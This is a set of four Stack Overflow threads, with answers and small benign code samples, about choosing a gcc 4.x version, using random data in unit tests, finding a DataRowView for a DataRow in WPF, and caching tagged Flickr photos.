Q: Which 4.x version of gcc should one use? The product-group I work for is currently using gcc 3.4.6 (we know it is ancient) for a large low-level c-code base, and want to upgrade to a later version. We have seen performance benefits testing different versions of gcc 4.x on all hardware platforms we tested it on. We are however very scared of c-compiler bugs (for a good reason historically), and wonder if anyone has insight into which version we should upgrade to. Are people using 4.3.2 for large code-bases and feel that it works fine? A: When I migrated a project from GCC 3 to GCC 4 I ran several tests to ensure that behavior was the same before and after. Can you just run a set of (hopefully automated) tests to confirm the correct behavior? After all, you want the "correct" behavior, not necessarily the GCC 3 behavior. A: The best quality control for gcc is the linux kernel. GCC is the compiler of choice for basically all major open source C/C++ programs. A released GCC, especially one like 4.3.X, which is in major linux distros, should be pretty good. GCC 4.3 also has better support for optimizations on newer cpus. A: I don't have a specific version for you, but why not have a 4.X and 3.4.6 installed? Then you could try and keep the code compiling on both versions, and if you run across a show-stopping bug in 4, you have an exit policy. A: Use the latest one, but hunt down and understand each and every warning -Wall gives. For extra fun, there are more warning flags to frob. You do have an extensive suite of regression (and other) tests; run them all and check them. GCC (particularly C++, but also C) has changed quite a bit. It does much better code analysis and optimization, and does handle code that turns out to invoke undefined behaviour differently. So code that "worked fine" but really did rely on some particular interpretation of invalid constructions will probably break. Hopefully making the compiler emit a warning or error, but there is no guarantee of such luck. A: If you are interested in OpenMP then you will need to move to gcc 4.2 or greater. We are using 4.2.2 on a code base of around 5M lines and are not having any problems with it. A: I can't say anything about 4.3.2, but my laptop is a Gentoo Linux system built with GCC 4.3.{0,1} (depending on when each package was built), and I haven't seen any problems. This is mostly just standard desktop use, though. If you have any weird code, your mileage may vary.
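To act on the earlier suggestion of keeping both compilers installed, a small harness can build and run the regression suite under each one and flag any mismatch. A hedged sketch in Python; the compiler names, flags, and test invocation are all placeholders for whatever your project actually uses:

import subprocess

COMPILERS = ["gcc-3.4", "gcc-4.3"]  # assumption: both are on the PATH

results = {}
for cc in COMPILERS:
    exe = "./app_" + cc
    # build the same sources with each compiler
    subprocess.check_call([cc, "-O2", "-Wall", "-o", exe, "main.c"])
    # run the test suite and capture its output for comparison
    out = subprocess.run([exe, "--run-tests"], capture_output=True, text=True)
    results[cc] = out.stdout

if len(set(results.values())) != 1:
    print("test output differs between compilers - investigate before upgrading")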
{ "language": "en", "url": "https://stackoverflow.com/questions/32448", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "6" }
Q: Random data in Unit Tests? I have a coworker who writes unit tests for objects which fill their fields with random data. His reason is that it gives a wider range of testing, since it will test a lot of different values, whereas a normal test only uses a single static value. I've given him a number of different reasons against this, the main ones being: * *random values mean the test isn't truly repeatable (which also means that if the test can randomly fail, it can do so on the build server and break the build) *if it's a random value and the test fails, we need to a) fix the object and b) force ourselves to test for that value every time, so we know it works, but since it's random we don't know what the value was Another coworker added: * *If I am testing an exception, random values will not ensure that the test ends up in the expected state *random data is used for flushing out a system and load testing, not for unit tests Can anyone else add additional reasons I can give him to get him to stop doing this? (Or alternatively, is this an acceptable method of writing unit tests, and I and my other coworker are wrong?) A: There's a compromise. Your coworker is actually onto something, but I think he's doing it wrong. I'm not sure that totally random testing is very useful, but it's certainly not invalid. A program (or unit) specification is a hypothesis that there exists some program that meets it. The program itself is then evidence of that hypothesis. What unit testing ought to be is an attempt to provide counter-evidence to refute that the program works according to the spec. Now, you can write the unit tests by hand, but it really is a mechanical task. It can be automated. All you have to do is write the spec, and a machine can generate lots and lots of unit tests that try to break your code. I don't know what language you're using, but see here: Java http://functionaljava.org/ Scala (or Java) http://github.com/rickynils/scalacheck Haskell http://www.cs.chalmers.se/~rjmh/QuickCheck/ .NET: http://blogs.msdn.com/dsyme/archive/2008/08/09/fscheck-0-2.aspx These tools will take your well-formed spec as input and automatically generate as many unit tests as you want, with automatically generated data. They use "shrinking" strategies (which you can tweak) to find the simplest possible test case to break your code and to make sure it covers the edge cases well. Happy testing! A: *if it's a random value and the test fails, we need to a) fix the object and b) force ourselves to test for that value every time, so we know it works, but since it's random we don't know what the value was If your test case does not accurately record what it is testing, perhaps you need to recode the test case. I always want to have logs that I can refer back to for test cases so that I know exactly what caused it to fail, whether using static or random data. A: This kind of testing is called a Monkey test. When done right, it can smoke out bugs from the really dark corners. To address your concerns about reproducibility: the right way to approach this is to record the failed test entries, generate a unit test which probes for the entire family of the specific bug, and include in the unit test the one specific input (from the random data) which caused the initial failure. A: You should ask yourselves what is the goal of your test. Unit tests are about verifying logic, code flow and object interactions. Using random values tries to achieve a different goal, and thus reduces test focus and simplicity.
It is acceptable for readability reasons (generating UUIDs, ids, keys, etc.). Specifically for unit tests, I cannot recall even once when this method was successful in finding problems. But I have seen many determinism problems (in the tests) from trying to be clever with random values, and mainly with random dates. Fuzz testing is a valid approach for integration tests and end-to-end tests. A: Can you generate some random data once (I mean exactly once, not once per test run), then use it in all tests thereafter? I can definitely see the value in creating random data to test those cases that you haven't thought of, but you're right, having unit tests that can randomly pass or fail is a bad thing. A: There is a half-way house here which has some use, which is to seed your PRNG with a constant. That allows you to generate 'random' data which is repeatable. Personally I do think there are places where (constant) random data is useful in testing - after you think you've done all your carefully-thought-out corners, using stimuli from a PRNG can sometimes find other things. A: If you're using random input for your tests you need to log the inputs so you can see what the values are. This way if there is some edge case you come across, you can write the test to reproduce it. I've heard the same reasons from people for not using random input, but once you have insight into the actual values used for a particular test run then it isn't as much of an issue. The notion of "arbitrary" data is also very useful as a way of signifying something that is not important. We have some acceptance tests that come to mind where there is a lot of noise data that has no relevance to the test at hand. A: I think the problem here is that the purpose of unit tests is not catching bugs. The purpose is being able to change the code without breaking it, so how are you going to know that you broke your code when your random unit tests are green in your pipeline, just because they don't touch the right path? To me, doing this is insane. A different situation could be running them as integration tests or e2e tests, not as a part of the build, and just for some specific things, because in some situations you will need a mirror of your code in your asserts to test that way. And having a test suite as complex as your real code is like not having tests at all, because who is going to test your suite then? :p A: I am in favor of random tests, and I write them. However, whether they are appropriate in a particular build environment and which test suites they should be included in is a more nuanced question. Run locally (e.g., overnight on your dev box), randomized tests have found bugs both obvious and obscure. The obscure ones are arcane enough that I think random testing was really the only realistic way to flush them out. As a test, I took one tough-to-find bug discovered via randomized testing and had a half dozen crack developers review the function (about a dozen lines of code) where it occurred. None were able to detect it. Many of your arguments against randomized data are flavors of "the test isn't reproducible". However, a well-written randomized test will capture the seed used to start the randomized sequence and output it on failure. In addition to allowing you to repeat the test by hand, this allows you to trivially create a new test which tests the specific issue by hardcoding the seed for that test.
Of course, it's probably nicer to hand-code an explicit test covering that case, but laziness has its virtues, and this even allows you to essentially auto-generate new test cases from a failing seed.

The one point you make that I can't debate, however, is that it breaks the build systems. Most build and continuous-integration setups expect the tests to do the same thing, every time. So a test that randomly fails will create chaos, failing at random and pointing the finger at changes that were harmless.

A solution, then, is to still run your randomized tests as part of the build and CI tests, but run them with a fixed seed, for a fixed number of iterations. Hence the test always does the same thing, but still explores a bunch of the input space (if you run it for multiple iterations). Locally, e.g. when changing the class concerned, you are free to run it for more iterations or with other seeds. If randomized testing ever becomes more popular, you could even imagine a specific suite of tests which are known to be random, which could be run with different seeds (hence with increasing coverage over time), and where failures wouldn't mean the same thing as in deterministic CI systems (i.e., runs aren't associated 1:1 with code changes, so you don't point a finger at a particular change when things fail).

There is a lot to be said for randomized tests, especially well-written ones, so don't be too quick to dismiss them!

A: If you are doing TDD then I would argue that random data is an excellent approach. If your test is written with constants, then you can only guarantee your code works for those specific values. If your test randomly fails on the build server, there is likely a problem with how the test was written. Random data will help ensure any future refactoring will not rely on a magic constant. After all, if your tests are your documentation, then doesn't the presence of constants imply it only needs to work for those constants? I am exaggerating; however, I prefer to inject random data into my tests as a sign that "the value of this variable should not affect the outcome of this test". I will say, though, that if you use a random variable and then fork your test based on that variable, that is a smell.

A: A unit test is there to ensure the correct behaviour in response to particular inputs; in particular, all code paths/logic should be covered. There is no need to use random data to achieve this. If you don't have 100% code coverage with your unit tests, then fuzz testing by the back door is not going to achieve it, and it may even mean you occasionally don't achieve your desired code coverage. It may (pardon the pun) give you a 'fuzzy' feeling that you're getting to more code paths, but there may not be much science behind this. People often check code coverage when they run their unit tests for the first time and then forget about it (unless enforced by CI), so do you really want to be checking coverage against every run as a result of using random input data? It's just another thing to potentially neglect.

Also, programmers tend to take the easy path, and they make mistakes. They make just as many mistakes in unit tests as they do in the code under test. It's way too easy for someone to introduce random data and then tailor the asserts to the output order in a single run. Admit it, we've all done this. When the data changes, the order can change and the asserts fail, so a portion of the executions fail. This portion needn't be 1/2; I've seen exactly this result in failures 10% of the time.
It takes a long time to track down problems like this, and if your CI doesn't record enough data about enough of the runs, it can be even worse. Whilst there's an argument for saying "just don't make these mistakes", in a typical commercial programming setup there'll be a mix of abilities, with sometimes relatively junior people reviewing code for other junior people. You can write literally dozens more tests in the time it takes to debug one non-deterministic test and fix it, so make sure you don't have any. Don't use random data.

A: In my experience, unit tests and randomized tests should be kept separate. Unit tests serve to give certainty about the correctness of some cases, not only to catch obscure bugs. All that said, randomized testing is useful and should be done, separately from unit tests, but it should test a series of randomized values. I can't help thinking that testing one random value with every run is just not enough, either to be a sufficient randomized test or to be a truly useful unit test.

Another aspect is validating the test results. If you have random inputs, you have to calculate the expected output for them inside the test. This will, at some level, duplicate the tested logic, making the test only a mirror of the tested code itself. This will not sufficiently test the code, since the test might contain the same errors the original code does.

A: This is an old question, but I wanted to mention a library I created that generates objects filled with random data. It supports reproducing the same data if a test fails, by supplying a seed. It also supports JUnit 5 via an extension.

Example usage:

Person person = Instancio.create(Person.class);

Or a builder API for customising generation parameters:

Person person = Instancio.of(Person.class)
    .generate(field("age"), gen -> gen.ints().min(18).max(65))
    .create();

The GitHub repo has more examples: https://github.com/instancio/instancio

You can find the library on Maven Central:

<dependency>
    <groupId>org.instancio</groupId>
    <artifactId>instancio-junit</artifactId>
    <version>LATEST</version>
</dependency>

A: In the book Beautiful Code, there is a chapter called "Beautiful Tests", where the author goes through a testing strategy for the binary search algorithm. One paragraph is called "Random Acts of Testing", in which he creates random arrays to thoroughly test the algorithm. You can read some of this online at Google Books, page 95, but it's a great book worth having. So basically this shows that generating random data for testing is a viable option.

A: Your co-worker is doing fuzz testing, although he doesn't know about it. Fuzz tests are especially valuable in server systems.

A: One advantage for someone looking at the tests is that arbitrary data is clearly not important. I've seen too many tests that involved dozens of pieces of data, where it can be difficult to tell what needs to be that way and what just happens to be that way. E.g., if an address validation method is tested with a specific zip code and all other data is random, then you can be pretty sure the zip code is the only important part.

A: Depending on your object/app, random data would have a place in load testing. I think more important would be to use data that explicitly tests the boundary conditions of the data.

A: We just ran into this today. I wanted pseudo-random data (so it would look like compressed audio data in terms of size), and I noted in a TODO that I also wanted it deterministic. rand() behaved differently on OS X than on Linux, and unless I re-seeded, it could change at any time.
So we changed it to be deterministic but still pseudo-random: the test is repeatable, as much as using canned data (but more conveniently written). This was NOT testing by some random brute force through code paths. That's the difference: still deterministic, still repeatable, still using data that looks like real input to run a set of interesting checks on edge cases in complex logic. Still unit tests.

Does that still qualify as random? Let's talk over beer. :-)

A: I can envisage three solutions to the test data problem:

* Test with fixed data
* Test with random data
* Generate random data once, then use it as your fixed data

I would recommend doing all of the above. That is, write repeatable unit tests with both some edge cases worked out using your brain and some randomised data which you generate only once. Then write a set of randomised tests that you run as well.

The randomised tests should never be expected to catch something your repeatable tests miss. You should aim to cover everything with repeatable tests, and consider the randomised tests a bonus. If they find something, it should be something that you couldn't have reasonably predicted; a real oddball.

A: How can your guy run the test again when it has failed, to see if he has fixed it? That is, he loses the repeatability of his tests. While I think there is probably some value in flinging a load of random data at tests, as mentioned in other replies it falls more under the heading of load testing than anything else. It is pretty much a "testing-by-hope" practice. I think that, in reality, your guy is simply not thinking about what he is trying to test, and is making up for that lack of thought by hoping randomness will eventually trap some mysterious error. So the argument I would use with him is that he is being lazy. Or, to put it another way, if he doesn't take the time to understand what he is trying to test, it probably shows he doesn't really understand the code he is writing.
{ "language": "en", "url": "https://stackoverflow.com/questions/32458", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "180" }
Q: Get the DefaultView DataRowView from a DataRow Here's the situation: I need to bind a WPF FixedPage against a DataRow. Bindings don't work against DataRows; they work against DataRowViews. I need to do this in the most generic way possible, as I know nothing about, and have no control over, what is in the DataRow. What I need is to be able to get a DataRowView for a given DataRow. I can't use the Find() method on the DefaultView because that takes a key, and there is no guarantee the table will have a primary key set. Does anybody have a suggestion as to the best way to go about this?

A: Not exactly a sexy piece of code, but there doesn't seem to be an automated way to find the row without just looping over the view:

DataRowView newRowView = null;
foreach (DataRowView tempRowView in myDataTable.DefaultView)
{
    // Reference comparison: each DataRowView wraps exactly one DataRow.
    if (tempRowView.Row == rowToMatch)
    {
        newRowView = tempRowView;
        break;
    }
}

if (newRowView != null)
    UseNewRowView(newRowView);
else
    HandleRowNotFound();

(The original snippet tested `newRow` instead of `newRowView` in the final condition; that has been corrected here.)

A: row.Table.DefaultView[row.Table.Rows.IndexOf(row)]

This is an okay answer, though note that this positional trick only lines up when the DefaultView has no sort or filter applied; once it does, view indexes no longer correspond to table indexes. But if you find yourself in this situation, you should consider learning more about DataViews and how they are used, then refactor your code to be view-centric rather than table-centric.
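Combining the two answers, a generic lookup might be wrapped in a small helper like the following sketch (the class and method names here are mine, not part of the framework); unlike the indexing trick, it tolerates a sorted or filtered view:

using System.Data;

public static class DataRowViewLookup
{
    // Returns the DataRowView in the row's table's DefaultView that wraps
    // the given DataRow, or null if the view's current filter excludes it.
    public static DataRowView FindViewFor(DataRow row)
    {
        foreach (DataRowView view in row.Table.DefaultView)
        {
            if (view.Row == row)   // reference comparison is sufficient
                return view;
        }
        return null;
    }
}

Usage would then be something like: fixedPage.DataContext = DataRowViewLookup.FindViewFor(someRow);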
{ "language": "en", "url": "https://stackoverflow.com/questions/32460", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "8" }
Q: Pulling limited tagged photos from Flickr So I've got a hobby site I'm working on. I've got items that are tagged, and I want to associate those items with photos from Flickr. Even with restrictive searches, I might get results numbering in the thousands.

Requirements:

* I want to display between 10 and 20 pictures, but I want to randomize the photos each time.
* I don't want to hit Flickr every time a page request is made.
* Not every Flickr photo with the same tags as my item will be relevant.

How should I store that number of results, and how would I determine which ones are relevant?

A: I would suggest moving the code that selects, randomizes, downloads and caches photos into a separate service. It could be a locally accessible REST application. Keep your core code clean, and don't clutter it with remote operations and retention policy.

1. Build a tags-to-images map and store it locally, in a file or a database. Randomizing an array is easy in both cases.
2. Point each image src at the local cache. Clean the cache periodically, depending on your hosting capacity.
3. Whitelist or blacklist photos to filter them in step 1.

A: Your best bet for parts 1 and 2 is to make a large request, say returning 100 or 200 photos, and store the URLs and other details. Then producing random selections from your local copy should be simple. For part 3, I'm not sure how you would accomplish this without some form of human intervention, unless you can define 'relevant' in terms you can program against. If human intervention is fine, then obviously they can browse your local copy of photos and pick relevant ones (or discard irrelevant ones).
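A minimal sketch of the "fetch once, cache, then randomize per request" idea from both answers (all names are placeholders; a real cache entry would carry the photo title, tags and Flickr page URL as well as the image URL):

using System;
using System.Collections.Generic;

public class PhotoCache
{
    private readonly List<string> cachedPhotoUrls;   // filled once from a single large Flickr query
    private readonly Random random = new Random();

    public PhotoCache(List<string> cachedPhotoUrls)
    {
        this.cachedPhotoUrls = cachedPhotoUrls;
    }

    // Returns 'count' photos chosen at random, without hitting Flickr again.
    public List<string> PickRandom(int count)
    {
        // Fisher-Yates shuffle of a copy, then take the first 'count' items.
        var shuffled = new List<string>(cachedPhotoUrls);
        for (int i = shuffled.Count - 1; i > 0; i--)
        {
            int j = random.Next(i + 1);
            string tmp = shuffled[i];
            shuffled[i] = shuffled[j];
            shuffled[j] = tmp;
        }
        return shuffled.GetRange(0, Math.Min(count, shuffled.Count));
    }
}

The shuffle-then-take approach guarantees no duplicates within one page, which repeatedly picking random indexes would not.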
{ "language": "en", "url": "https://stackoverflow.com/questions/32462", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "0" }